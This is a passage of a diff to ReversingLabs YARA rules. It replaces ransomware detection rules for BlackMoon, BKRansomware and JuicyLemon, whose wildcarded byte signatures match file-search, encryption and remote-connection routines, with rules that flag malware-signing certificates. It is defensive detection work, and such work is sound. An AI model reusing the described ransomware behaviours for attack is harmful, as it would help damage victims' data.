24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? - ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 - 8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? - ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 48 8D 4C 24 - ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? - 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ?? - ?? ?? 74 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? - ?? 3D ?? ?? ?? ?? 75 ?? E9 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48 98 48 8B 8C 24 ?? - ?? ?? ?? 0F B7 04 41 83 F8 ?? 75 ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48 - } - $find_files_p2 = { - 98 48 8B 8C 24 ?? ?? ?? ?? 0F B7 04 41 83 F8 ?? 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C - 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? - E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48 98 48 8B 8C 24 ?? ?? ?? ?? - 0F B7 04 41 83 F8 ?? 75 ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48 98 48 8B - 8C 24 ?? ?? ?? ?? 0F B7 04 41 83 F8 ?? 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 4C - 24 ?? E8 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ?? - ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 85 C0 75 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 85 C0 75 ?? EB ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B 4C - 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 - 81 C4 - } - $encrypt_files = { - 48 89 4C 24 ?? 48 83 EC ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 - 24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? - ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 48 89 44 24 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? B9 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 48 89 44 24 ?? BA ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 54 24 - ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 48 8B 15 ?? ?? ?? ?? 48 8B 4C 24 ?? - E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 41 B8 ?? ?? ?? ?? 33 D2 - 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? - 48 8B 4C 24 ?? 48 89 48 ?? 48 8B 44 24 ?? C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? 48 C7 - 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? - 48 89 48 ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 89 48 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 48 8B 4C 24 ?? 48 89 41 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 41 ?? - 48 8B 44 24 ?? C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? 48 83 C0 ?? 48 8B 94 24 ?? ?? ?? - ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 98 4C 8B C0 48 8D - 15 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 48 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 83 C0 ?? - 48 8B D0 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 54 24 - ?? 48 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 45 33 C9 41 B8 - ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 50 ?? 48 8B 44 24 ?? 48 8B 48 ?? FF 15 ?? ?? ?? ?? - 48 8D 05 ?? ?? ?? ?? F0 FF 00 48 83 C4 ?? C3 - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($enum_shares) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Telefonicasa" and pe.signatures[i].serial=="08:3e:3f" and 999002664<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Blackmoon : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_79227311Acdd575759198Dbd3544Cca7 : INFO FILE { meta: - description = "Yara rule that detects BlackMoon ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "95ebb6c4-b0c9-5f9a-8424-a2f4d33953eb" - date = "2020-11-11" - modified = "2020-11-11" + id = "350f7c25-f20f-5e8f-aa52-163cf3de3be1" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.BlackMoon.yara#L1-L70" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "428409096a8637978bf2a1efb3238e4ba87715a909693b0cd26c0f689d567a09" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15792-L15808" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "73e920d51faf7150329ce189d1693c29a2285a02d54fee27e5af5afe3238295b" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "BlackMoon" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 81 EC ?? ?? ?? ?? 53 8B 9C 24 ?? ?? ?? ?? 55 56 8B 33 57 8B BC 24 ?? ?? ?? ?? 33 ED - 85 FF 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 76 ?? 85 F6 74 ?? 83 FE ?? 74 ?? 56 FF - 15 ?? ?? ?? ?? 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 89 33 74 ?? 8B 84 - 24 ?? ?? ?? ?? 85 C0 74 ?? 8B 4C 24 ?? 83 E1 ?? 80 F9 ?? 74 ?? EB ?? 8B 94 24 ?? ?? - ?? ?? 8B 44 24 ?? 85 C2 74 ?? BD ?? ?? ?? ?? 85 F6 74 ?? 83 FE ?? 74 ?? 85 ED 75 ?? - 8B 84 24 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 85 C0 8D 44 24 ?? 50 56 74 ?? FF D7 85 C0 74 - ?? 8B 4C 24 ?? 83 E1 ?? 80 F9 ?? 75 ?? 8D 54 24 ?? 52 56 FF D7 85 C0 75 ?? 5F 5E 5D - 33 C0 5B 81 C4 ?? ?? ?? ?? C3 FF D7 85 C0 74 ?? 8B 9C 24 ?? ?? ?? ?? 85 5C 24 ?? 75 - ?? 8D 4C 24 ?? 51 56 FF D7 85 C0 75 ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 8D 54 24 ?? - 52 E8 ?? ?? ?? ?? 40 50 E8 ?? ?? ?? ?? 8B D0 8D 7C 24 ?? 83 C9 ?? 33 C0 83 C4 ?? F2 - AE F7 D1 2B F9 8B C1 8B F7 8B FA C1 E9 ?? F3 A5 8B C8 8B C2 83 E1 ?? F3 A4 5F 5E 5D - 5B 81 C4 ?? ?? ?? ?? C3 - } - $encrypt_files_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? - 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? - 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? - B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? DB - 45 ?? DD 5D ?? DD 45 ?? DB 45 ?? DD 5D ?? DC 65 ?? DD 5D ?? DD 45 ?? E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 6A ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? - ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B - 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D - ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 - } - $encrypt_files_p2 = { - 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 - 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? - ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? - ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? - 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? - ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A - ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? - B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 - DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? - 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2 - } - condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="79:22:73:11:ac:dd:57:57:59:19:8d:bd:35:44:cc:a7" and 1478131200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Bkransomware : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_13Ae38C9Ae21A8576C0D024D : INFO FILE { meta: - description = "Yara rule that detects BKRansomware ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "88dc5c4a-046a-52e2-b108-0a90b91d4fb6" - date = "2020-07-15" - modified = "2020-07-15" + id = "416c5eb3-bc6d-5fb0-a7fe-58cdd6c7c39d" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.BKRansomware.yara#L1-L79" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3118098f05a13bd161af0cb1ec322878b371ff70b9f3815a04115a214c0965a2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15810-L15826" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7be892eaf9e2e31442f7ef5ffd296dd17696d6c95d20eb2758ede2c553b05f38" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "BKRansomware" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $search_files = { - 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B F9 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? - 57 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? - 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? EB ?? 8D A4 24 ?? ?? ?? ?? 90 - 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? - 8B B5 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B - 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 - 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 74 ?? B8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? - 66 8B 11 66 3B 10 75 ?? 66 85 D2 74 ?? 66 8B 51 ?? 66 3B 50 ?? 75 ?? 83 C1 ?? 83 C0 - ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57 8D - 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 83 FE ?? 74 ?? - 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? - 50 57 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 - FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $encrypt_files_p1 = { - 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 57 6A ?? 68 - ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B F9 68 ?? ?? ?? ?? 57 89 BD ?? ?? ?? ?? FF 15 ?? ?? - ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 56 6A ?? 53 FF 15 ?? ?? ?? - ?? 8B F0 68 ?? ?? ?? ?? 57 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? - ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 - C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? - ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 - ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? - 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 - C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 0F 8E ?? ?? ?? ?? 33 - } - $encrypt_files_p2 = { - FF 8D 49 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 68 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? 33 F6 8D 51 ?? EB ?? 8D 49 ?? 8A 01 41 84 C0 75 ?? 2B CA 74 ?? BB ?? ?? ?? ?? - 8A 84 35 ?? ?? ?? ?? 3C ?? 7C ?? 3C ?? 7F ?? 0F BE C0 83 E8 ?? 99 F7 FB 80 C2 ?? EB - ?? 3C ?? 7C ?? 3C ?? 7F ?? 0F BE C0 83 E8 ?? 99 F7 FB 80 C2 ?? 88 94 35 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? 46 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 3B F0 72 ?? 8B 9D ?? ?? ?? - ?? 6A ?? 6A ?? 57 53 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8D 9B ?? ?? ?? ?? - 8A 01 41 84 C0 75 ?? 6A ?? 8D 85 ?? ?? ?? ?? 2B CA 50 51 8D 85 ?? ?? ?? ?? 50 53 FF - 15 ?? ?? ?? ?? 03 BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? - ?? ?? 83 C4 ?? 3B BD ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 53 FF 15 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? - 5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 - } - condition: - uint16(0)==0x5A4D and ($search_files) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="13:ae:38:c9:ae:21:a8:57:6c:0d:02:4d" and 1475062802<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Juicylemon : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_557B0Abf44045827F1F36Efbc96271Ec : INFO FILE { meta: - description = "Yara rule that detects JuicyLemon ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "35e4bbd6-422b-562e-98fc-fe932270dbb8" - date = "2020-08-17" - modified = "2020-08-17" + id = "64db0b43-b73f-594d-9f04-2cdf76df7c9b" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.JuicyLemon.yara#L1-L116" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "596d89843793307f4940dbb85b2e7081f02250f6adfdcd01f2d3c5f2b8b90875" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15828-L15844" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "633e8d6b44d62443d991738fa82b9742ac5634051bba5d0cdb3d6b35d66bdc8f" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "JuicyLemon" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $remote_connection_1 = { - 55 8B EC 83 C4 ?? 53 56 57 89 4D ?? 8B FA 8B F0 C6 45 ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? - 6A ?? FF 15 ?? ?? ?? ?? 8B D8 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 57 56 53 FF 15 ?? ?? ?? - ?? 8B F0 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 56 FF 15 - ?? ?? ?? ?? 8B F8 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 6A ?? 68 ?? ?? ?? ?? 57 FF - 15 ?? ?? ?? ?? 85 C0 74 ?? C6 45 ?? ?? 57 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 53 - FF 15 ?? ?? ?? ?? 8A 45 ?? 5F 5E 5B 59 59 5D C2 - } - $remote_connection_2 = { - 55 8B EC 33 C9 51 51 51 51 51 51 51 53 56 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? - 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 DB 8D 55 ?? 8B - 45 ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? - ?? 66 BE ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? 66 BE ?? ?? 8D 45 ?? E8 - ?? ?? ?? ?? 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? - ?? 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D6 - 59 E8 ?? ?? ?? ?? 84 C0 74 ?? B3 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 - } - $find_files_and_encrypt = { - E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 14 B2 E8 ?? ?? ?? ?? 8B - 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 88 45 ?? 46 4B 75 ?? A1 ?? ?? ?? ?? BA ?? ?? - ?? ?? E8 ?? ?? ?? ?? 75 ?? 80 7D ?? ?? 75 ?? 8B 5D ?? 4B 85 DB 7C ?? 43 33 F6 8D 85 - ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 - ?? ?? ?? ?? 46 4B 75 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? 5A E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? - E8 ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 - A1 ?? ?? ?? ?? 8B 00 FF D0 8B 1D ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 85 DB 74 - ?? 6A ?? A1 ?? ?? ?? ?? 8B 00 FF D0 EB ?? B3 ?? 8D 85 ?? ?? ?? ?? 8B D3 80 C2 ?? E8 - ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 8B 00 FF - D0 83 F8 ?? 76 ?? 83 F8 ?? 74 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 85 ?? - ?? ?? ?? 8B D3 80 C2 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8B 95 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 FF 05 ?? - ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 8D 46 ?? 50 6A ?? 56 68 ?? ?? ?? ?? 68 